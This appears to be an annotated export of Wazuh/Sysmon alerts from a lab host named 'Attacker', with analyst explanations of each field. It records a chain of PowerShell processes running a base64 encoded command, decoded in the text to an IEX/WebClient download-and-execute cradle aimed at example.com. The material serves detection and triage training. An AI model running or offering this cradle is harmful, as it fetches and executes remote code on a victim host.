data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:54.445 ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} ProcessId: 5944 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} ParentProcessId: 9020 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:54.445
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd42-680a-5b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5944
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. A profile root, Temp or Downloads folder points to interactive or dropped-file execution rather than a service.

data.win.eventdata.user:  Attacker\\Attcker1
DOMAIN\user the process runs as. Here the domain part equals the hostname, so this is a local account; pivot on it across the other alerts.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Join it to Security event 4624 on the same host to learn how the user got in (console, RDP, network).

data.win.eventdata.logonId:  0x26584
Logon session ID (same value as 4624's LogonId). Identical across all the PowerShell alerts here, so they share one session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 = services/non-interactive, 1 and up = an interactive console or RDP session; 1 here means a logged-on user.

data.win.eventdata.integrityLevel:  Medium
Mandatory integrity level of the process token. Medium = standard user, High = elevated admin, System = SYSTEM. Medium means no elevation yet; watch for a later High.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file, algorithms per Sysmon's HashAlgorithms setting. Compare against a known-good powershell.exe of this build or a reputation service.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd3f-680a-590b-000000000e00}
Sysmon GUID of the parent. Match it to the processGuid of an earlier EID 1 to rebuild the full process tree (here it points at the previous PowerShell in the chain).

data.win.eventdata.parentProcessId:  9020
PID of the parent at spawn time. Subject to reuse, so prefer parentProcessGuid for joins.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that spawned this process. PowerShell spawning PowerShell with an encoded command is exactly the pattern rule 92057 keys on; a chain of them is a strong signal.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Here it carries the same -EncodedCommand payload as the child, so each PowerShell in the chain is re-running the same cradle.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. A change of user between parent and child would indicate credential use or token manipulation; none here.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:57.351+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:57.351+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  65
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534277.1517908
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means eventID follows Sysmon numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider. Useful for filtering if the provider name is ever localised or spoofed.

data.win.system.eventID:  11
Event ID in the provider's numbering. The provider is Sysmon, so 11 = FileCreate; do not read it as a Security-log ID like 4624 or 4688.

data.win.system.version:  2
Schema version of the event template. Sysmon bumps it when fields are added, so it governs which eventdata fields you can expect.

data.win.system.level:  4
ETW level; 4 = Informational. Sysmon writes nearly everything at 4, so this carries no severity signal.

data.win.system.task:  11
Task category. For Sysmon it simply repeats the event ID (11 = FileCreate), unlike the Security log's Logon / Policy Change categories.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:55.3537134Z
UTC time the record was written to the event log. Normally trails eventdata.utcTime by milliseconds to seconds; a large gap hints at buffering or clock drift.

data.win.system.eventRecordID:  284144
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service itself, not the process being reported on. It is 3712 in every alert here, which confirms that.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Rarely useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Microsoft-Windows-Sysmon/Operational is what the Wazuh agent's Sysmon localfile entry collects.

data.win.system.computer:  Attacker
Hostname as stamped in the event. Should equal agent.name; a mismatch means a forwarded log or a mis-enrolled agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:55.314 ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} ProcessId: 5944 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1 CreationUtcTime: 2025-04-24 22:37:55.314 User: Attacker\Attcker1"
Full event text as rendered by the Sysmon provider. Every data.win.eventdata.* field below is parsed out of this string; fall back to it when a parsed field looks truncated or mis-escaped.

data.win.eventdata.utcTime:  2025-04-24 22:37:55.314
Sysmon's own UTC timestamp for the action (process creation or file creation). Compare it with the alert timestamp to see agent-to-manager delay; for ordering events on the host, prefer this field.

data.win.eventdata.processGuid:  {94294ddc-bd42-680a-5b0b-000000000e00}
Sysmon's unique ID for the process. PIDs get recycled; this value does not, so use it to join this event with EID 11/3/7 from the same process and to walk parentProcessGuid chains.

data.win.eventdata.processId:  5944
Windows PID. Reused once the process exits, so only trust it next to processGuid or within a tight time window.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. Check it really is the System32 powershell.exe: look-alike names or user-writable locations are a red flag; confirm with hashes.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1
Path of the file created. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell itself at startup to probe AppLocker/WDAC script enforcement; rule 92213 catches it because it is a script in a watched folder. On its own this is a well-known benign source of noise; the real signal is the encoded-command PowerShell that created it (join on processGuid).

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:55.314
Creation timestamp from the filesystem. Equal to utcTime here, so the file was genuinely new; an earlier value means an existing file was overwritten.

data.win.eventdata.user:  Attacker\\Attcker1
DOMAIN\user the process runs as. Here the domain part equals the hostname, so this is a local account; pivot on it across the other alerts.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:00.018+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:00.018+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  62
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534280.1520673
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means eventID follows Sysmon numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider. Useful for filtering if the provider name is ever localised or spoofed.

data.win.system.eventID:  1
Event ID in the provider's numbering. The provider is Sysmon, so 1 = ProcessCreate (Sysmon's richer counterpart to Security 4688), not a classic Security-log ID.

data.win.system.version:  5
Schema version of the event template. Sysmon bumps it when fields are added (version 5 of EID 1 is the one that carries ParentUser), so it governs which eventdata fields you can expect.

data.win.system.level:  4
ETW level; 4 = Informational. Sysmon writes nearly everything at 4, so this carries no severity signal.

data.win.system.task:  1
Task category. For Sysmon it simply repeats the event ID (1 = ProcessCreate), unlike the Security log's Logon / Policy Change categories.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:58.3360432Z
UTC time the record was written to the event log. Normally trails eventdata.utcTime by milliseconds to seconds; a large gap hints at buffering or clock drift.

data.win.system.eventRecordID:  284163
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service itself, not the process being reported on. It is 3712 in every alert here, which confirms that.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Rarely useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Microsoft-Windows-Sysmon/Operational is what the Wazuh agent's Sysmon localfile entry collects.

data.win.system.computer:  Attacker
Hostname as stamped in the event. Should equal agent.name; a mismatch means a forwarded log or a mis-enrolled agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:56.657 ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} ProcessId: 5188 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} ParentProcessId: 5944 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full event text as rendered by the Sysmon provider. Every data.win.eventdata.* field below is parsed out of this string; fall back to it when a parsed field looks truncated or mis-escaped.

data.win.eventdata.utcTime:  2025-04-24 22:37:56.657
Sysmon's own UTC timestamp for the action (process creation or file creation). Compare it with the alert timestamp to see agent-to-manager delay; for ordering events on the host, prefer this field.

data.win.eventdata.processGuid:  {94294ddc-bd44-680a-5d0b-000000000e00}
Sysmon's unique ID for the process. PIDs get recycled; this value does not, so use it to join this event with EID 11/3/7 from the same process and to walk parentProcessGuid chains.

data.win.eventdata.processId:  5188
Windows PID. Reused once the process exits, so only trust it next to processGuid or within a tight time window.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. Check it really is the System32 powershell.exe: look-alike names or user-writable locations are a red flag; confirm with hashes.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the binary (10.0.26100 is the Windows 11 24H2 / Server 2025 build). Pair it with hashes to confirm a genuine Microsoft build.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Attacker-controlled on non-Microsoft binaries, so corroborate rather than trust.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource. Same caveat as description: easy to forge, useful only as corroboration.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource. "Microsoft Corporation" only means something once the hash or signature checks out.

data.win.eventdata.originalFileName:  PowerShell.EXE
Name compiled into the PE. If it differs from the file name in image, the binary was renamed, a common way to dodge name-based rules.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line. The image path appears twice (as argv[0] and again as the first argument). The base64 after -EncodedCommand is UTF-16LE text and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. Always decode this field before triage.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. A profile root, Temp or Downloads folder points to interactive or dropped-file execution rather than a service.

data.win.eventdata.user:  Attacker\\Attcker1
DOMAIN\user the process runs as. Here the domain part equals the hostname, so this is a local account; pivot on it across the other alerts.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Join it to Security event 4624 on the same host to learn how the user got in (console, RDP, network).

data.win.eventdata.logonId:  0x26584
Logon session ID (same value as 4624's LogonId). Identical across all the PowerShell alerts here, so they share one session.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 = services/non-interactive, 1 and up = an interactive console or RDP session; 1 here means a logged-on user.

data.win.eventdata.integrityLevel:  Medium
Mandatory integrity level of the process token. Medium = standard user, High = elevated admin, System = SYSTEM. Medium means no elevation yet; watch for a later High.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file, algorithms per Sysmon's HashAlgorithms setting. Compare against a known-good powershell.exe of this build or a reputation service.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd42-680a-5b0b-000000000e00}
Sysmon GUID of the parent. Match it to the processGuid of an earlier EID 1 to rebuild the full process tree (here it points at the previous PowerShell in the chain).

data.win.eventdata.parentProcessId:  5944
PID of the parent at spawn time. Subject to reuse, so prefer parentProcessGuid for joins.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that spawned this process. PowerShell spawning PowerShell with an encoded command is exactly the pattern rule 92057 keys on; a chain of them is a strong signal.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Here it carries the same -EncodedCommand payload as the child, so each PowerShell in the chain is re-running the same cradle.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. A change of user between parent and child would indicate credential use or token manipulation; none here.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:01.135+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:01.135+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  66
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534281.1528736
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means eventID follows Sysmon numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider. Useful for filtering if the provider name is ever localised or spoofed.

data.win.system.eventID:  11
Event ID in the provider's numbering. The provider is Sysmon, so 11 = FileCreate; do not read it as a Security-log ID like 4624 or 4688.

data.win.system.version:  2
Schema version of the event template. Sysmon bumps it when fields are added, so it governs which eventdata fields you can expect.

data.win.system.level:  4
ETW level; 4 = Informational. Sysmon writes nearly everything at 4, so this carries no severity signal.

data.win.system.task:  11
Task category. For Sysmon it simply repeats the event ID (11 = FileCreate), unlike the Security log's Logon / Policy Change categories.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:58.5451085Z
UTC time the record was written to the event log. Normally trails eventdata.utcTime by milliseconds to seconds; a large gap hints at buffering or clock drift.

data.win.system.eventRecordID:  284164
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service itself, not the process being reported on. It is 3712 in every alert here, which confirms that.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Rarely useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Microsoft-Windows-Sysmon/Operational is what the Wazuh agent's Sysmon localfile entry collects.

data.win.system.computer:  Attacker
Hostname as stamped in the event. Should equal agent.name; a mismatch means a forwarded log or a mis-enrolled agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:58.543 ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} ProcessId: 5188 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tsd2bll.s43.ps1 CreationUtcTime: 2025-04-24 22:37:58.543 User: Attacker\Attcker1"
Full event text as rendered by the Sysmon provider. Every data.win.eventdata.* field below is parsed out of this string; fall back to it when a parsed field looks truncated or mis-escaped.

data.win.eventdata.utcTime:  2025-04-24 22:37:58.543
Sysmon's own UTC timestamp for the action (process creation or file creation). Compare it with the alert timestamp to see agent-to-manager delay; for ordering events on the host, prefer this field.

data.win.eventdata.processGuid:  {94294ddc-bd44-680a-5d0b-000000000e00}
Sysmon's unique ID for the process. PIDs get recycled; this value does not, so use it to join this event with EID 11/3/7 from the same process and to walk parentProcessGuid chains.

data.win.eventdata.processId:  5188
Windows PID. Reused once the process exits, so only trust it next to processGuid or within a tight time window.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. Check it really is the System32 powershell.exe: look-alike names or user-writable locations are a red flag; confirm with hashes.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tsd2bll.s43.ps1
Path of the file created. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by PowerShell itself at startup to probe AppLocker/WDAC script enforcement; rule 92213 catches it because it is a script in a watched folder. On its own this is a well-known benign source of noise; the real signal is the encoded-command PowerShell that created it (join on processGuid).
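Both EID 11 alerts on this page (this one and the earlier __PSScriptPolicyTest_ibqrrzzz.zs1.ps1 hit) are the same benign probe, yet rule 92213 scores them 15. The following is an added example, not SOCscribe or Wazuh code, of how an analyst-side triage step can separate that known writer from a real drop into the same folder. The two real events are copied from the alerts above; the other three events, the allow-list, the extension set and the watched-folder list are constructed assumptions to adapt to your own baseline. Note that the allow-list pins the file name to the image allowed to create it, so a benign-looking name from any other process is escalated rather than suppressed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Writers that legitimately drop script/executable content into watched folders.
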